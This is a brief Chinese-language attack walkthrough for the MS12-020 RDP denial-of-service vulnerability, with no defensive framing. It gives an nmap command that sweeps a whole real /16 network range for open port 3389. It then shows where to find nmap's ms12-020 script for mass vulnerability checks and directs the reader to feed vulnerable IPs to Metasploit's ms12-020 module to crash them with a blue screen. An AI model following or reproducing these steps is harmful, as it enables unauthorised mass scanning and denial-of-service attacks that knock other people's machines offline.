漏洞名称:
MS12-020
远程桌面协议
RDP
拒绝访问漏洞
条件:受害者必须开放
RDP
协议 开放了
3389
端口 或者端口改了,知道对方
RDP
开放的对应端口。
1.nmap
扫描某网段内开放
3389
端口的主机
nmap -vv –open -p 3389 -Pn 60.10.0.0/16
<
这一过程可以用其他扫描器如
msscan
代替
>
2.利用
nmap
中的
ms12-020
脚本批量扫描漏洞是否存在
cd /usr/share/nmap/script
ls | grep ms12-020
3.
导出存在漏洞的
ip
,利用
msf
的
ms12-020
执行蓝屏攻击